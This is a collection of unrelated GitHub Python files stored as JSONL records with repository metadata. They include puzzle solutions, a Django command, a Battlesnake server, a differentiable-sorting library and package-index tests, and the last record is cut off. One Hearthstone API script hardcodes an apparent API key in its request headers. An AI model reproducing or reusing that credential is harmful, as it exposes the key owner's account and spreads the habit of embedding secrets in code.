+{"seq_id":"72454057500","text":"n = int(input())\nlis = input().split()\nlis2 = input().split()\n\nx = 0\ny = 0\n\nfor i in range(n):\n a = lis[i]\n b = lis2[i]\n if a == \"rock\":\n if b == \"paper\":\n y += 1\n elif b == \"scissors\":\n x += 1\n \n elif a == \"paper\":\n if b == \"rock\":\n x += 1\n elif b == \"scissors\":\n y += 1\n \n else:\n if b == \"rock\":\n y += 1\n elif b == \"paper\":\n x += 1\nprint(x, y)","repo_name":"AlanBui1/Competitive-Programming-Solutions","sub_path":"hkccc15j1.py","file_name":"hkccc15j1.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"71450327580","text":"from django.contrib.auth import get_user_model\nfrom django.core.management.base import BaseCommand\n\nfrom supergood_reads.models import UserSettings\n\n\nclass Command(BaseCommand):\n help = \"Create UserSettings for existing users\"\n\n def handle(self, *args, **kwargs):\n user_model = get_user_model()\n\n user_ids_with_settings = UserSettings.objects.values_list(\"user_id\", flat=True)\n users_without_settings = user_model.objects.exclude(\n id__in=user_ids_with_settings\n )\n\n new_user_settings = []\n for user in users_without_settings:\n new_user_settings.append(UserSettings(user=user))\n UserSettings.objects.bulk_create(new_user_settings)\n\n created_count = len(new_user_settings)\n self.stdout.write(\n self.style.SUCCESS(f\"Total UserSettings created: {created_count}\")\n )\n","repo_name":"supergood-org/supergood-reads","sub_path":"supergood_reads/management/commands/supergood_reads_create_user_settings.py","file_name":"supergood_reads_create_user_settings.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"17584765820","text":"#!/usr/bin/python3\n\n# pylint: disable=missing-module-docstring\n# pylint: disable=missing-class-docstring\n# pylint: disable=missing-function-docstring\n\nimport pymedia_redis\nimport pymedia_display\n\nfrom pymedia_const import REDIS_SERVER, REDIS_PORT, REDIS_DB\n\n# ---------------------\n\nif __name__ == '__main__':\n\n _redis = pymedia_redis.RedisHelper(REDIS_SERVER, REDIS_PORT, REDIS_DB,\n 'DISPLAY')\n\n display = pymedia_display.Display(_redis, pubsubs=(\n 'PLAYER:EVENT',\n 'CDSP:EVENT',\n ))\n\n display.t_wait_events.start()\n\n try:\n display.t_wait_events.join()\n except KeyboardInterrupt:\n print(\"Received KeyboardInterrupt, shutting down...\")\n display.blank()\n","repo_name":"taradiddles/diy-dsp-preamp","sub_path":"pymedia/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"69986427099","text":"import json\r\nfrom pprint import pprint\r\nimport requests\r\n\r\nprint(\"¿Que quieres?\")\r\nprint(\"Buscar una carta\")\r\nprint(\"Buscar varias\")\r\nopcion=int(input(\"¿Que quieres?\"))\r\n\r\nif opcion==1:\r\n carta=input(\"Introduzca el nombre\")\r\n response = requests.get(\"https://omgvamp-hearthstone-v1.p.mashape.com/cards/\"+carta,\r\n headers={\r\n \"X-Mashape-Key\": \"RdEHCET0tBmshzcVxojLE997hAvNp1qWbaQjsn2UdJz0ad4JQA\",\r\n \"Accept\": \"application/json\"\r\n }\r\n)\r\n data=response.json()\r\n for carta in data:\r\n if carta[\"collectible\"]==True:\r\n print(\"Nombre:\",carta[\"name\"])\r\n print(\"Vida:\",carta[\"health\"])\r\n print(\"Ataque:\",carta[\"attack\"])\r\n\r\nelse:\r\n print(\"Nada\")\r\n\r\n\r\n\r\nexpansion=\"¿Que expansion deseas buscar?\"\r\n\r\nresponse = requests.get(\"https://omgvamp-hearthstone-v1.p.mashape.com/cards/sets/\"+expansion,\r\n headers={\r\n \"X-Mashape-Key\": \"RdEHCET0tBmshzcVxojLE997hAvNp1qWbaQjsn2UdJz0ad4JQA\"\r\n }\r\n)\r\ndata=response.json()\r\n\r\nfor carta in data:\r\n\tif carta[\"type\"]==\"Hero\":\r\n\t\tprint (carta[\"name\"])\r\n","repo_name":"Alexlp1092/ProyectoWeb","sub_path":"pruebashearthstone.py","file_name":"pruebashearthstone.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"10966523776","text":"from .bitonic_loops import bitonic_layer_loop, bitonic_swap_loop\n\ntry:\n # try to use autoray to provide transparent JAX/autograd support\n from autoray import numpy as np\nexcept ModuleNotFoundError:\n print(\"No autoray, using numpy (note: grad won't work!)\")\n import numpy as np\n\n\n### Softmax (log-sum-exp)\ndef softmax(a, b, alpha=1, normalize=0):\n \"\"\"The softmaximum of softmax(a,b) = log(e^a + a^b).\n normalize should be zero if a or b could be negative and can be 1.0 (more accurate)\n if a and b are strictly positive.\n Also called \\alpha-quasimax: \n J. Cook. Basic properties of the soft maximum. \n Working Paper Series 70, UT MD Anderson CancerCenter Department of Biostatistics, \n 2011. http://biostats.bepress.com/mdandersonbiostat/paper7\n \"\"\"\n return np.log(np.exp(a * alpha) + np.exp(b * alpha) - normalize) / alpha\n\n\n### Smooth max\ndef smoothmax(a, b, alpha=1):\n return (a * np.exp(a * alpha) + b * np.exp(b * alpha)) / (\n np.exp(a * alpha) + np.exp(b * alpha)\n )\n\n\n### relaxed softmax\ndef softmax_smooth(a, b, smooth=0):\n \"\"\"The smoothed softmaximum of softmax(a,b) = log(e^a + a^b).\n With smooth=0.0, is softmax; with smooth=1.0, averages a and b\"\"\"\n t = smooth / 2.0\n return np.log(np.exp((1 - t) * a + b * t) + np.exp((1 - t) * b + t * a)) - np.log(\n 1 + smooth\n )\n\n\ndef bitonic_matrices(n):\n \"\"\"Compute a set of bitonic sort matrices to sort a sequence of\n length n. n *must* be a power of 2.\n \n See: https://en.wikipedia.org/wiki/Bitonic_sorter\n \n Set k=log2(n).\n There will be k \"layers\", i=1, 2, ... k\n \n Each ith layer will have i sub-steps, so there are (k*(k+1)) / 2 sorting steps total.\n \n For each step, we compute 4 matrices. l and r are binary matrices of size (k/2, k) and\n map_l and map_r are matrices of size (k, k/2).\n \n l and r \"interleave\" the inputs into two k/2 size vectors. map_l and map_r \"uninterleave\" these two k/2 vectors\n back into two k sized vectors that can be summed to get the correct output.\n \n The result is such that to apply any layer's sorting, we can perform:\n \n l, r, map_l, map_r = layer[j]\n a, b = l @ y, r @ y \n permuted = map_l @ np.minimum(a, b) + map_r @ np.maximum(a,b)\n \n Applying this operation for each layer in sequence sorts the input vector.\n \n \"\"\"\n # number of outer layers\n\n matrices = []\n for n, m, layer in bitonic_layer_loop(n):\n l, r = np.zeros((n // 2, n)), np.zeros((n // 2, n))\n map_l, map_r = np.zeros((n, n // 2)), np.zeros((n, n // 2))\n for a, b, out, swap in bitonic_swap_loop(n, m, layer):\n l[out, a] = 1\n r[out, b] = 1\n if swap:\n a, b = b, a\n map_l[a, out] = 1\n map_r[b, out] = 1\n matrices.append((l, r, map_l, map_r))\n return matrices\n\n\ndef bitonic_indices(n):\n \"\"\"Compute a set of bitonic sort indices to sort a sequence of\n length n. n *must* be a power of 2. As opposed to the matrix\n operations, this requires only two index vectors of length n\n for each layer of the network.\n \n \"\"\"\n # number of outer layers\n layers = int(np.log2(n))\n indices = []\n for n, m, layer in bitonic_layer_loop(n):\n weave = np.zeros(n, dtype=\"i4\")\n unweave = np.zeros(n, dtype=\"i4\")\n for a, b, out, swap in bitonic_swap_loop(n, m, layer):\n weave[out] = a\n weave[out + n // 2] = b\n if swap:\n a, b = b, a\n unweave[a] = out\n unweave[b] = out + n // 2\n indices.append((weave, unweave))\n return indices\n\n\ndef bitonic_woven_matrices(n):\n \"\"\"\n Combine the l,r and l_inv, r_inv matrices into single n x n multiplies, for\n use with bisort_weave/diff_bisort_weave, fusing together consecutive stages.\n This reduces the number of multiplies to (k)(k+1) + 1 multiplies, where k=np.log2(n) \n \"\"\"\n layers = int(np.log2(n))\n matrices = []\n last_unweave = np.eye(n)\n for n, m, layer in bitonic_layer_loop(n):\n weave, unweave = np.zeros((n, n)), np.zeros((n, n))\n for a, b, out, swap in bitonic_swap_loop(n, m, layer):\n weave[out, a] = 1\n weave[out + n // 2, b] = 1\n # flip comparison order as needed\n if swap:\n a, b = b, a\n unweave[a, out] = 1\n unweave[b, out + n // 2] = 1\n # fuse the unweave and weave steps\n matrices.append(weave @ last_unweave)\n last_unweave = unweave\n # make sure the last unweave is preserved\n matrices.append(last_unweave)\n return matrices\n\n\ndef diff_sort(matrices, x, softmax=softmax):\n \"\"\"\n Approximate differentiable sort. Takes a set of bitonic sort matrices generated by bitonic_matrices(n), sort \n a sequence x of length n. Values may be distorted slightly but will be ordered.\n \"\"\"\n for l, r, map_l, map_r in matrices:\n a, b = l @ x, r @ x\n mx = softmax(a, b)\n mn = a + b - mx\n x = map_l @ mn + map_r @ mx\n\n return x\n\n\ndef diff_sort_indexed(indices, x, softmax=softmax):\n \"\"\"\n Given a set of bitonic sort indices generated by bitonic_indices(n), sort \n a sequence x of length n.\n \"\"\"\n split = len(x) // 2\n for weave, unweave in indices:\n woven = x[weave]\n a, b = woven[:split], woven[split:]\n mx = softmax(a, b)\n mn = a + b - mx\n x = np.concatenate([mn, mx])[unweave]\n return x\n\n\ndef comparison_sort(matrices, x, compare_fn, alpha=1, scale=250):\n \"\"\"\n Sort a tensor X, applying a differentiable comparison function \"compare_fn\" \n while sorting. Uses softmax to weight components of the matrix.\n \n Parameters:\n ------------\n matrices: the nxn bitonic sort matrices created by bitonic_matrices\n X: an [n,...] tensor of elements\n compare_fn: a differentiable comparison function compare_fn(a,b)\n taking a pair of [n//2,...] tensors and returning a signed [n//2] vector.\n alpha=1.0: smoothing to apply; smaller alpha=smoother, less accurate sorting,\n larger=harder max, increased numerical instability\n scale=250: scaling applied to output of compare_fn. Default is useful for \n comparison functions returning values in the range ~[-1, 1]\n \n Returns:\n ----------\n X_sorted: [n,...] tensor (approximately) sorted accoring to compare_fn\n \n \"\"\" \n for l, r, map_l, map_r in matrices: \n score = compare_fn((x.T @ l.T).T, (x.T @ r.T).T) \n a, b = score*scale, score*-scale\n a_weight = np.exp(a * alpha) / (np.exp(a * alpha) + np.exp(b * alpha))\n b_weight = 1 - a_weight \n # apply weighting to the full vectors\n aX = x.T @ l.T\n bX = x.T @ r.T \n w_max = (a_weight * aX + b_weight * bX)\n w_min = (b_weight * aX + a_weight * bX) \n # recombine into the full vector\n x = ( w_max @ map_l.T) + (w_min @ map_r.T) \n x = x.T\n \n return x\n\n\ndef vector_sort(matrices, X, key, alpha=1):\n \"\"\"\n Sort a matrix X, applying a differentiable function \"key\" to each vector\n while sorting. Uses softmax to weight components of the matrix.\n \n For example, selecting the nth element of each vector by \n multiplying with a one-hot vector.\n \n Parameters:\n ------------\n matrices: the nxn bitonic sort matrices created by bitonic_matrices\n X: an [n,d] matrix of elements\n key: a function taking a d-element vector and returning a scalar\n alpha=1.0: smoothing to apply; smaller alpha=smoother, less accurate sorting,\n larger=harder max, increased numerical instability\n \n Returns:\n ----------\n X_sorted: [n,d] matrix (approximately) sorted accoring to \n \n \"\"\"\n for l, r, map_l, map_r in matrices:\n\n x = key(X)\n # compute weighting on the scalar function\n a, b = l @ x, r @ x\n a_weight = np.exp(a * alpha) / (np.exp(a * alpha) + np.exp(b * alpha))\n b_weight = 1 - a_weight\n # apply weighting to the full vectors\n aX = l @ X\n bX = r @ X\n w_max = (a_weight * aX.T + b_weight * bX.T).T\n w_min = (b_weight * aX.T + a_weight * bX.T).T\n # recombine into the full vector\n X = (map_l @ w_max) + (map_r @ w_min)\n return X\n\n\ndef diff_sort_weave(fused, x, softmax=softmax, beta=0.0):\n \"\"\"\n Given a set of bitonic sort matrices generated by bitonic_woven_matrices(n), sort \n a sequence x of length n.\n beta specifies interpolation between true permutations (beta=0.0) and\n leaving the values unchanged (beta=1.0)\n \"\"\"\n i = np.eye(len(x))\n split = len(x) // 2\n x = ((beta * i) + (1 - beta) * fused[0]) @ x\n for mat in fused[1:]:\n a, b = x[:split], x[split:]\n mx = softmax(a, b)\n mn = a + b - mx\n x = (beta * i + (1 - beta) * mat) @ np.concatenate([mn, mx])\n return x\n\n\n### differentiable ranking\ndef order_matrix(original, sortd, sigma=0.1):\n \"\"\"Apply a simple RBF kernel to the difference between original and sortd,\n with the kernel width set by sigma. Normalise each row to sum to 1.0.\"\"\"\n diff = ((original).reshape(-1, 1) - sortd.reshape(1, -1)) ** 2\n rbf = np.exp(-(diff) / (2 * sigma ** 2))\n return (rbf.T / np.sum(rbf, axis=1)).T\n\n\ndef dargsort(original, sortd, sigma, transpose=False):\n \"\"\"Take an input vector `original` and a sorted vector `sortd`\n along with an RBF kernel width `sigma`, return an approximate ranking.\n If transpose is True, returns approximate argsort (but note that ties have identical values)\n If transpose is False (default), returns ranking\"\"\"\n order = order_matrix(original, sortd, sigma=sigma)\n if transpose:\n order = order.T\n return order @ np.arange(len(original))\n\n\ndef diff_argsort(matrices, x, sigma=0.1, softmax=softmax, transpose=False):\n\n \"\"\"Return the smoothed, differentiable ranking of each element of x. Sigma\n specifies the smoothing of the ranking. Note that this function is deceptively named,\n and in the default setting returns the *ranking*, not the argsort.\n \n If transpose is True, returns argsort (but note that ties are not broken in differentiable\n argsort);\n If False, returns ranking (likewise, ties are not broken).\n \"\"\"\n sortd = diff_sort(matrices, x, softmax)\n return dargsort(x, sortd, sigma, transpose)\n\n\ndef diff_argsort_indexed(indices, x, sigma=0.1, softmax=softmax, transpose=False):\n \"\"\"Return the smoothed, differentiable ranking of each element of x. Sigma\n specifies the smoothing of the ranking. Uses the indexed form\n to avoid multiplies.\n \n If transpose is True, returns argsort (but note that ties are not broken in differentiable\n argsort);\n If False, returns ranking (likewise, ties are not broken).\n \"\"\"\n sortd = diff_sort_indexed(indices, x, softmax)\n return dargsort(x, sortd, sigma, transpose)\n","repo_name":"johnhw/differentiable_sorting","sub_path":"differentiable_sorting/differentiable_sorting.py","file_name":"differentiable_sorting.py","file_ext":"py","file_size_in_byte":11209,"program_lang":"python","lang":"en","doc_type":"code","stars":137,"dataset":"github-code","pt":"69"}
+{"seq_id":"36927937047","text":"import os\nimport random\n\nimport cherrypy\n\n\"\"\"\nThis is a simple Battlesnake server written in Python.\nFor instructions see https://github.com/BattlesnakeOfficial/starter-snake-python/README.md\n\"\"\"\n\n\nclass Battlesnake(object):\n @cherrypy.expose\n @cherrypy.tools.json_out()\n def index(self):\n # This function is called when you register your Battlesnake on play.battlesnake.com\n # It controls your Battlesnake appearance and author permissions.\n # TIP: If you open your Battlesnake URL in browser you should see this data\n return {\n \"apiversion\": \"1\",\n \"author\": \"Mandeep Dalavi\", # TODO: Your Battlesnake Username\n \"color\": \"#CF9FFF\", # TODO: Personalize\n \"head\": \"beluga\", # TODO: Personalize\n \"tail\": \"curled\", # TODO: Personalize\n }\n\n @cherrypy.expose\n @cherrypy.tools.json_in()\n def start(self):\n # This function is called everytime your snake is entered into a game.\n # cherrypy.request.json contains information about the game that's about to be played.\n data = cherrypy.request.json\n\n print(\"START\")\n return \"ok\"\n\n @cherrypy.expose\n @cherrypy.tools.json_in()\n @cherrypy.tools.json_out()\n def move(self):\n # This function is called on every turn of a game. It's how your snake decides where to move.\n # Valid moves are \"up\", \"down\", \"left\", or \"right\".\n # TODO: Use the information in cherrypy.request.json to decide your next move.\n data = cherrypy.request.json\n body = data[\"you\"][\"body\"]\n\n # Choose a random direction to move in\n possible_moves = [\"up\", \"down\", \"left\", \"right\"]\n safe_moves = self.getSafeMoves(possible_moves, body, data[\"board\"])\n\n if safe_moves:\n move = random.choice(safe_moves)\n return {\"move\" : move}\n\n return {\"move\" : 'up'}\n\n def getNext(self, currentHead, nextMove):\n futureHead = currentHead.copy()\n if nextMove == 'left':\n futureHead['x'] = currentHead['x'] - 1\n if nextMove == 'right':\n futureHead['x'] = currentHead['x'] + 1\n if nextMove == 'up':\n futureHead['y'] = currentHead['y'] + 1\n if nextMove == 'down':\n futureHead['y'] = currentHead['y'] - 1\n return futureHead\n \n def getSafeMoves(self, possible_moves, body, board):\n safe_moves = []\n\n for guess in possible_moves:\n # check if we make this move, will the decisions\n guessCoord = self.getNext(body[0], guess)\n if self.avoidWalls(guessCoord, board[\"width\"], board[\"height\"]) and self.avoidSnakes(guessCoord, board[\"snakes\"]):\n safe_moves.append(guess)\n elif len(body)>1 and guessCoord == body[-1] and guess not in body[:-1]:\n safe_moves.append(guess)\n return safe_moves\n\n def avoidWalls(self, futureHead, width, height):\n result = True\n x = int(futureHead['x'])\n y = int(futureHead['y'])\n\n if x < 0 or y < 0 or x >= width or y >= height:\n result = False\n\n return result\n\n def avoidSnakes(self, futureHead, snakeBodies):\n for snake in snakeBodies:\n if futureHead in snake[\"body\"][:-1]:\n return False\n return True\n\n @cherrypy.expose\n @cherrypy.tools.json_in()\n def end(self):\n # This function is called when a game your snake was in ends.\n # It's purely for informational purposes, you don't have to make any decisions here.\n data = cherrypy.request.json\n\n print(\"END\")\n return \"ok\"\n\n\nif __name__ == \"__main__\":\n server = Battlesnake()\n cherrypy.config.update({\"server.socket_host\": \"0.0.0.0\"})\n cherrypy.config.update(\n {\"server.socket_port\": int(os.environ.get(\"PORT\", \"8080\")),}\n )\n print(\"Starting Battlesnake Server...\")\n cherrypy.quickstart(server)\n","repo_name":"MandeepDalavi/Battlesnake","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"42053043533","text":"X,Y=map(int,input().split())\r\nN=int(input())\r\nL=[]\r\nfor i in range(N):\r\n L.append([int(x) for x in input().split()])\r\nMin=2147483647\r\nA,B=0,0\r\nfor i in L:\r\n if Min>abs(X-i[0])**2+abs(Y-i[1])**2:\r\n Min=abs(X-i[0])**2+abs(Y-i[1])**2\r\n A,B=i[0],i[1]\r\nprint(A,B)\r\n","repo_name":"Benson0418/python_t2","sub_path":"h658.py","file_name":"h658.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"21572513331","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom sklearn import linear_model\r\n\r\ndf = pd.read_csv('honeyproduction.csv')\r\n\r\nprod_per_year = df.groupby('year').totalprod.mean().reset_index()\r\nX = prod_per_year['year']\r\nX = X.values.reshape(-1, 1)\r\ny = prod_per_year['totalprod']\r\n\r\nregr = linear_model.LinearRegression()\r\nregr.fit(X, y)\r\ny_predict = regr.predict(X)\r\n\r\nX_future = np.array(range(2013, 2050))\r\nX_future = X_future.reshape(-1, 1)\r\nfuture_predict = regr.predict(X_future)\r\n\r\nplt.scatter(X, y)\r\nplt.plot(X, y_predict)\r\nplt.plot(X_future, future_predict)\r\nplt.savefig('honey_future.png')\r\nplt.show()\r\n\r\nprint(df.head())\r\nprint(regr.coef_)\r\nprint(regr.intercept_)\r\n","repo_name":"johnchae/honey-linear-regression","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"8050803192","text":"\ndef merge(arr, left, mid, right): \n\tn1 = mid - left + 1\n\tn2 = right- mid \n\n\tLeftArray = [0] * (n1) \n\tRightArray = [0] * (n2) \n\n\tfor i in range(0 , n1): \n\t\tLeftArray[i] = arr[left + i] \n\n\tfor j in range(0 , n2): \n\t\tRightArray[j] = arr[mid + 1 + j]\n \n\ti = 0\n\tj = 0\n\tk = left\t \n\n\twhile i < n1 and j < n2 : \n\t\tif LeftArray[i] <= RightArray[j]: \n\t\t\tarr[k] = LeftArray[i] \n\t\t\ti += 1\n\t\telse: \n\t\t\tarr[k] = RightArray[j] \n\t\t\tj += 1\n\t\tk += 1\n\twhile i < n1: \n\t\tarr[k] = LeftArray[i] \n\t\ti += 1\n\t\tk += 1\n\n\twhile j < n2: \n\t\tarr[k] = RightArray[j] \n\t\tj += 1\n\t\tk += 1\n \ndef mergeSort(arr,left,right): \n\tif left < right: \n\t\tmid = (left+right)//2\n\n\t\tmergeSort(arr, left, mid) \n\t\tmergeSort(arr, mid+1, right) \n\t\tmerge(arr, left, mid, right) \n\narr=[3,1,235,5,56,32,33,21,1]\nmergeSort(arr,0,len(arr)-1)\nprint(arr)\n\n\n\n","repo_name":"samirpatil2000/Data-Struture-Algo","sub_path":"C_&C++/c/array/mergeSort.py","file_name":"mergeSort.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"38202101352","text":"import six\n\nfrom packetary.objects.index import Index\n\nfrom packetary import objects\nfrom packetary.tests import base\nfrom packetary.tests.stubs.generator import gen_package\nfrom packetary.tests.stubs.generator import gen_relation\n\n\nclass TestIndex(base.TestCase):\n def test_add(self):\n index = Index()\n index.add(gen_package(version=1))\n self.assertIn(\"package1\", index.packages)\n self.assertIn(1, index.packages[\"package1\"])\n self.assertIn(\"obsoletes1\", index.obsoletes)\n self.assertIn(\"provides1\", index.provides)\n\n index.add(gen_package(version=2))\n self.assertEqual(1, len(index.packages))\n self.assertIn(1, index.packages[\"package1\"])\n self.assertIn(2, index.packages[\"package1\"])\n self.assertEqual(1, len(index.obsoletes))\n self.assertEqual(1, len(index.provides))\n\n def test_find(self):\n index = Index()\n p1 = gen_package(version=1)\n p2 = gen_package(version=2)\n index.add(p1)\n index.add(p2)\n\n self.assertIs(\n p1,\n index.find(\"package1\", objects.VersionRange(\"eq\", 1))\n )\n self.assertIs(\n p2,\n index.find(\"package1\", objects.VersionRange())\n )\n self.assertIsNone(\n index.find(\"package1\", objects.VersionRange(\"gt\", 2))\n )\n\n def test_find_all(self):\n index = Index()\n p11 = gen_package(idx=1, version=1)\n p12 = gen_package(idx=1, version=2)\n p21 = gen_package(idx=2, version=1)\n p22 = gen_package(idx=2, version=2)\n index.add(p11)\n index.add(p12)\n index.add(p21)\n index.add(p22)\n\n self.assertItemsEqual(\n [p11, p12],\n index.find_all(\"package1\", objects.VersionRange())\n )\n self.assertItemsEqual(\n [p21, p22],\n index.find_all(\"package2\", objects.VersionRange(\"le\", 2))\n )\n\n def test_find_newest_package(self):\n index = Index()\n p1 = gen_package(idx=1, version=2)\n p2 = gen_package(idx=2, version=2)\n p2.obsoletes.append(\n gen_relation(p1.name, [\"lt\", p1.version])\n )\n index.add(p1)\n index.add(p2)\n\n self.assertIs(\n p1, index.find(p1.name, objects.VersionRange(\"eq\", p1.version))\n )\n self.assertIs(\n p2, index.find(p1.name, objects.VersionRange(\"eq\", 1))\n )\n\n def test_find_top_down(self):\n index = Index()\n p1 = gen_package(version=1)\n p2 = gen_package(version=2)\n index.add(p1)\n index.add(p2)\n self.assertIs(\n p2,\n index.find(\"package1\", objects.VersionRange(\"le\", 2))\n )\n self.assertIs(\n p1,\n index.find(\"package1\", objects.VersionRange(\"lt\", 2))\n )\n self.assertIsNone(\n index.find(\"package1\", objects.VersionRange(\"lt\", 1))\n )\n\n def test_find_down_up(self):\n index = Index()\n p1 = gen_package(version=1)\n p2 = gen_package(version=2)\n index.add(p1)\n index.add(p2)\n self.assertIs(\n p2,\n index.find(\"package1\", objects.VersionRange(\"ge\", 2))\n )\n self.assertIs(\n p2,\n index.find(\"package1\", objects.VersionRange(\"gt\", 1))\n )\n self.assertIsNone(\n index.find(\"package1\", objects.VersionRange(\"gt\", 2))\n )\n\n def test_find_accurate(self):\n index = Index()\n p1 = gen_package(version=1)\n p2 = gen_package(version=2)\n index.add(p1)\n index.add(p2)\n self.assertIs(\n p1,\n index.find(\"package1\", objects.VersionRange(\"eq\", 1))\n )\n self.assertIsNone(\n index.find(\"package1\", objects.VersionRange(\"eq\", 3))\n )\n\n def test_find_obsolete(self):\n index = Index()\n p1 = gen_package(version=1)\n index.add(p1)\n\n self.assertIs(\n p1, index.find(\"obsoletes1\", objects.VersionRange(\"le\", 2))\n )\n self.assertIsNone(\n index.find(\"obsoletes1\", objects.VersionRange(\"gt\", 2))\n )\n\n def test_find_provides(self):\n index = Index()\n p1 = gen_package(version=1)\n p2 = gen_package(version=2)\n index.add(p1)\n index.add(p2)\n\n self.assertIs(\n p2, index.find(\"provides1\", objects.VersionRange(\"ge\", 2))\n )\n self.assertIsNone(\n index.find(\"provides1\", objects.VersionRange(\"gt\", 2))\n )\n\n def test_len(self):\n index = Index()\n for i in six.moves.range(3):\n index.add(gen_package(idx=i + 1))\n self.assertEqual(3, len(index))\n\n for i in six.moves.range(3):\n index.add(gen_package(idx=i + 1, version=2))\n self.assertEqual(6, len(index))\n self.assertEqual(3, len(index.packages))\n\n for i in six.moves.range(3):\n index.add(gen_package(idx=i + 1, version=2))\n self.assertEqual(6, len(index))\n self.assertEqual(3, len(index.packages))\n","repo_name":"HuongNT-CloudNFV/fuel-mirror","sub_path":"packetary/tests/test_index.py","file_name":"test_index.py","file_ext":"py","file_size_in_byte":5096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"40798892900","text":"if __name__ == '__main__':\n import pandas as pd\n import geopandas as gpd\n import numpy as np\n from utils.BBI_utils import mergeData, computeBBI, simpleLowpassFilter, getSuperelevation, getAdvisorySpeed, \\\n alignData\n from utils.LRS_utils import NCATgetReferencePoints, getDistToMid, getReferenceCurve, NCATgetRadius\n from utils.NCAT_processing import NCAT_processing\n from utils.SR_processing import SR_processing\n\n loc = pd.read_csv(r'2021_03_11_07_36_21_506_loc.csv')\n acc = pd.read_csv(r'2021_03_11_07_36_21_506_acc.csv')\n print(acc)\n print(acc.shape)\n crash = pd.read_csv(r'Crashdata.csv')\n # Chooses certain columns\n crash = crash.filter(items=['Road_Name', 'KABCO_Seve', 'Manner_of_', 'Location_a', 'Latitude', 'Longitude'])\n # Filters out all collision based crashes\n crash = crash[crash['Manner_of_'].eq('Not a Collision with Motor Vehicle')]\n # Filters out intersection crashes\n crash = crash[crash['Location_a'].str.contains('Non-Intersection') | crash['Location_a'].eq('Off Roadway')]\n print(crash)\n print(crash.shape)\n SR_obj = SR_processing(inFiles=[r'2021_03_11_07_36_21_506_loc.csv',r'2021_03_11_07_36_21_506_acc.csv'])\n SR_obj.gdf.to_file(\"smartphone.shp\")\n print(acc.columns)\n print(loc.columns)\n print(loc)\n # Not sure why this merge doesn't work...\n # all_csv_data = pd.merge(left=loc, right=acc, how='left', left_on='timestamp_utc_local', right_on='timestamp_nanosecond')\n all_csv_data = pd.concat([loc, acc], axis=1)\n print(all_csv_data)\n road_17 = gpd.read_file('0017_D1_2/0017_D1_2.shp')\n # print(SR_obj.gdf)","repo_name":"steveand117/tsai-ML-curve-safety","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"38391934704","text":"from torch.utils.data.dataset import Dataset\nimport pandas as pd\nimport torch\nfrom sklearn.preprocessing import MinMaxScaler\nimport pickle\nfrom typing import List\n\n# Keys of the different types of variables.\ncat_vars = [\n \"Store\",\n \"DayOfWeek\",\n \"StateHoliday\",\n \"CompetitionMonthsOpen\",\n \"Promo2Weeks\",\n \"StoreType\",\n \"Assortment\",\n \"State\",\n \"Week\",\n \"Events\",\n \"Is_quarter_end_DE\",\n \"Is_quarter_start\",\n \"WindDirDegrees\",\n \"Is_quarter_start_DE\",\n \"Is_month_end\",\n \"Open\",\n \"Is_year_end\",\n \"Is_year_start_DE\",\n \"Is_month_start_DE\",\n \"Promo2\",\n \"Is_year_end_DE\",\n \"Dayofweek\",\n \"Is_month_start\",\n]\n\ncont_vars = [\n \"Sales\",\n \"Promo2SinceWeek\",\n \"Max_TemperatureC\",\n \"Mean_TemperatureC\",\n \"Min_TemperatureC\",\n \"Max_Humidity\",\n \"Mean_Humidity\",\n \"Min_Humidity\",\n \"Max_Wind_SpeedKm_h\",\n \"Mean_Wind_SpeedKm_h\",\n \"CloudCover\",\n \"trend\",\n \"trend_DE\",\n \"Promo\",\n \"SchoolHoliday\",\n \"Min_VisibilitykM\",\n \"Min_DewpointC\",\n \"Mean_VisibilityKm\",\n \"Precipitationmm\",\n \"MeanDew_PointC\",\n \"Mean_Sea_Level_PressurehPa\",\n \"Max_Sea_Level_PressurehPa\",\n \"Promo2Days\",\n \"Customers\",\n \"CompetitionDaysOpen\",\n \"Dew_PointC\",\n \"Dayofyear\",\n \"Min_Sea_Level_PressurehPa\",\n \"Max_Gust_SpeedKm_h\",\n \"Elapsed\",\n \"Max_VisibilityKm\",\n \"CompetitionOpenSinceMonth\",\n \"CompetitionOpenSinceYear\",\n \"Promo2SinceYear\",\n]\n\nweather_vars = [\n \"Max_TemperatureC\",\n \"Mean_TemperatureC\",\n \"Min_TemperatureC\",\n \"Dew_PointC\",\n \"MeanDew_PointC\",\n \"Min_DewpointC\",\n \"Max_Humidity\",\n \"Mean_Humidity\",\n \"Min_Humidity\",\n \"Max_Sea_Level_PressurehPa\",\n \"Mean_Sea_Level_PressurehPa\",\n \"Min_Sea_Level_PressurehPa\",\n \"Max_VisibilityKm\",\n \"Mean_VisibilityKm\",\n \"Min_VisibilitykM\",\n \"Max_Wind_SpeedKm_h\",\n \"Mean_Wind_SpeedKm_h\",\n \"Max_Gust_SpeedKm_h\",\n \"Precipitationmm\",\n \"CloudCover\",\n \"WindDirDegrees\",\n]\n\noutput_file_name = \"./data/joined_cleaned.pkl\"\n\n\ndef data_clean(joined: pd.DataFrame) -> pd.DataFrame:\n \"\"\"[function currently does basic na forward\n filling and conversion of variables to useful types.\n I 